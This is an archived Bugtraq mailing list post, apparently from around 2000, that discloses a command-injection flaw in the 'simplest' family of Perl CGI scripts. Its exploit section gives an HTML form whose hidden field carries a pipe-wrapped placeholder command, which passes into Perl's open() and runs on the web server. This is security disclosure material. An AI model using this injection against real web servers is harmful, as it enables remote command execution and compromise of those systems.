Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Insecure input validation in simplestmail.cgi

From: suid () SNEAKERZ ORG
Date: Mon, 13 Dec 0100 01:14:04 +0000
simplestmail.cgi is another Perl cgi written by "Tammie's HUSBAND" Leif

Wright.

The whole group of "simplest" cgi's are bad. web developers: dont use them

I didnt really post this because its pretty lame but i looked at a few of these
a while back and heres something i put on my site in feburary. (which used to
be suid.edu and is now www.sneakerz.org/~suid/)

suid () sneakerz org - mini advisory - Tammies Husband Guestbook CGI

Software:       simplestguest.cgi       
URL:            http://www.conservatives.net/atheist/scripts/simplestguest.html
Version:        Version 2
Platforms:      Unix
Type:           Input validation problem

Summary:

        Anyone can execute any command on the remote system with
        the priveleges of the web server.

Vulnerability:

        The perl code does no input validation and performs an
        open() on a user supplied input.

Exploit:

        Build a HTML form resembling:

        <form action=/cgi-bin/simplestguest.cgi method=POST>
                <input type=hidden name=required value="NAME">
                <input type=hidden name=guestbook
                value=" | <command goes here> |">
                <input type=hidden name="NAME" value="X">
                <input type=submit>
        </form>

        Of course you could simply send this in a POST request directly
        to the web server. Whatever.


http://www.sneakerz.org/~suid/

EOF
Previous By Date Next
Previous By Thread Next

Current thread: